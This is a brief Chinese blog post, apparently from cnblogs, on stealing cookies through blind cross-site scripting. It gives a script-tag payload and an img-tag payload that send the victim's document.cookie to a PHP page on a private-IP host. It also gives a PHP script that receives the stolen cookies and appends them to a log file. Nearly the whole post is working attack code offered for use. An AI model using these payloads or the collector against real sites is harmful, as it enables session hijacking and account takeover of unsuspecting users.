XSS打cookie
盲打cookie payload
<script>document.location='http://192.168.0.176/Hcookie.php?cookie='+document.cookie;</script>
<img src='http://192.168.0.176/Hcookie.php?cookie='+document.cookie>
服务器
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt","a");
fwrite($log,$cookie."\n");
fclose($log);
?>
标签:XSS,php,http,盲打,cookie,document
From: https://www.cnblogs.com/cowpokee/p/17158046.html